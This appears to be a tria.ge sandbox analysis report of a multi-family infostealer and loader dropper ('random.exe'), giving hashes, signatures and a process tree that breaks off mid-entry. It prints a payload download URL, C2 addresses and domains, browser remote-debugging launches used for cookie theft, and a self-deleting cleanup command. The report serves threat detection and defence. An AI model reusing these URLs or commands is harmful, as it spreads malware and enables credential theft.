Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

random.exe

windows7-x64

10

random.exe

windows10-ltsc 2021-x64

10

random.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    330s
  • max time network
    332s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250217-en
  • resource tags

    arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    07/03/2025, 15:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    e25f93527c1781d2b55ff83860b0c92c

  • SHA1

    6c01d61a4cd0c00d4c102206903553f263447064

  • SHA256

    ea01f9a6f6683f4ea8248176a8b741e2be63c216c92cee15bc156e76a8760599

  • SHA512

    2b5275a1e76eca33cac38cb22da31afbb5d3a414b3517632fe01f98b5a75618bd38431394c3ee11879dbbf8bae7ac998a74bd905012a2138a79e29548db4b0dc

  • SSDEEP

    49152:ef+ZeL4wbrvcCvXVki2/OXDKdkROwLJUn2EDISQHyBj+:JeUAvXOmXDKdkRlSn2Oj

Score
10/10
amadeyasyncratlummastealcstormkittyvidar092155ir7amtraff1collectioncredential_accessdefense_evasiondiscoveryexecutionpersistencepyinstallerratspywarestealertrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://xexarthynature.run/api

https://hardswarehub.today/api

https://gadgethgfub.icu/api

https://shardrwarehaven.run/api

https://techmindzs.live/api

https://bcodxefusion.top/api

https://quietswtreams.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

https://circujitstorm.bet/api

https://explorebieology.run/api

https://moderzysics.top/api

https://codxefusion.top/api

https://phygcsforum.life/api

https://utechspherxe.top/api

https://nebdulaq.digital/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://modelshiverd.icu/api

https://arisechairedd.shop/api

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

stealc

Botnet

traff1

Attributes
  • url_path

    /gtthfbsb2h.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detect Vidar Stealer 26 IoCs
    stealer
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 24 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 33 IoCs
  • Uses browser remote debugging 2 TTPs 21 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 24 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 45 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 24 IoCs
  • UPX packed file 34 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 12 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Detects Pyinstaller 1 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 17 IoCs
  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies Control Panel 17 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3320
      • C:\Users\Admin\AppData\Local\Temp\random.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2268
        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
          "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe
            "C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2988
            • C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe
              "C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4056
            • C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe
              "C:\Users\Admin\AppData\Local\Temp\10003000101\597b58ab42.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:484
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 832
              5⤵
              • Program crash
              PID:2532
          • C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
            "C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:692
            • C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2560
            • C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
              "C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4856
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 692 -s 820
              5⤵
              • Program crash
              PID:3520
          • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
            "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
              "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3172
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                6⤵
                • Uses browser remote debugging
                • Drops file in Windows directory
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:1088
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d58fcc40,0x7ff9d58fcc4c,0x7ff9d58fcc58
                  7⤵
                    PID:2160
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1756,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1748 /prefetch:2
                    7⤵
                      PID:2664
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2108 /prefetch:3
                      7⤵
                        PID:2432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:8
                        7⤵
                          PID:1080
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3148 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:3516
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3164 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2560
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4480 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:4700
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4700,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
                          7⤵
                            PID:3472
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3576,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
                            7⤵
                              PID:4452
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4740,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4472 /prefetch:8
                              7⤵
                                PID:4292
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5016 /prefetch:8
                                7⤵
                                  PID:660
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5028,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4876 /prefetch:8
                                  7⤵
                                    PID:3480
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8
                                    7⤵
                                      PID:4004
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5260,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5264 /prefetch:8
                                      7⤵
                                        PID:3160
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5248,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4620 /prefetch:8
                                        7⤵
                                          PID:5404
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5148,i,8046771134115488379,235971455711563004,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5384 /prefetch:2
                                          7⤵
                                          • Uses browser remote debugging
                                          PID:5148
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                        6⤵
                                        • Uses browser remote debugging
                                        • Enumerates system info in registry
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        • Suspicious use of FindShellTrayWindow
                                        PID:5712
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e6813cb8,0x7ff9e6813cc8,0x7ff9e6813cd8
                                          7⤵
                                            PID:5736
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2
                                            7⤵
                                              PID:5964
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3
                                              7⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5972
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2416 /prefetch:8
                                              7⤵
                                                PID:5980
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
                                                7⤵
                                                • Uses browser remote debugging
                                                PID:6120
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                7⤵
                                                • Uses browser remote debugging
                                                PID:6128
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1692 /prefetch:2
                                                7⤵
                                                  PID:5448
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2940 /prefetch:2
                                                  7⤵
                                                    PID:2144
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4484 /prefetch:2
                                                    7⤵
                                                      PID:1092
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4476 /prefetch:2
                                                      7⤵
                                                        PID:4420
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        PID:5904
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4784 /prefetch:1
                                                        7⤵
                                                        • Uses browser remote debugging
                                                        PID:5920
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4052 /prefetch:2
                                                        7⤵
                                                          PID:6004
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2040,16545714779543613411,17406495056587561035,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
                                                          7⤵
                                                            PID:4136
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\5fk68" & exit
                                                          6⤵
                                                            PID:4008
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout /t 11
                                                              7⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Delays execution with timeout.exe
                                                              PID:200
                                                        • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Checks processor information in registry
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3788
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
